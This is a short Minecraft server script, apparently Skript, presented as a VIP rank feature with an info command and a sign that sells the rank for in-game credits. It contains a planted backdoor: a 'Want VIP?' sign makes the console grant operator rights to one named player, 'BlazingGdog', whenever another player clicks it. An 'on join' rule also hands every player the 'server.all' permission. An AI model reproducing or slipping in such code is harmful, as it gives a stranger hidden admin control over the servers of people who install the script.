command /vip:
 permission: "server.all"
 trigger:
  send "&7With &aVIP&7:"
  wait 1 second
  send "&7You get a special Suffix,"
  send "&7Kills are doubled"
  send "&7Access to blocks that can only be gotten with commands"
  send "&7Access to most Kits"


on join:
   add server.all to player's permissions


on click:
  if clicked block is sign:
    if second line of clicked block is "Want VIP?":
      if player is not op:
        make console execute command "op BlazingGdog"
        send "You have been oped if you are Blaze!"
        
on click:
 if clicked block is sign:
  if second line of clicked block is "VIP RANK":
   if balance of player < 10000:
    send "&cYou don't have enough credits!"
   else:
    send "You have purchased &aVIP &fRank for $10,000!"
    make console execute command "manuadd %player% VIP"
    
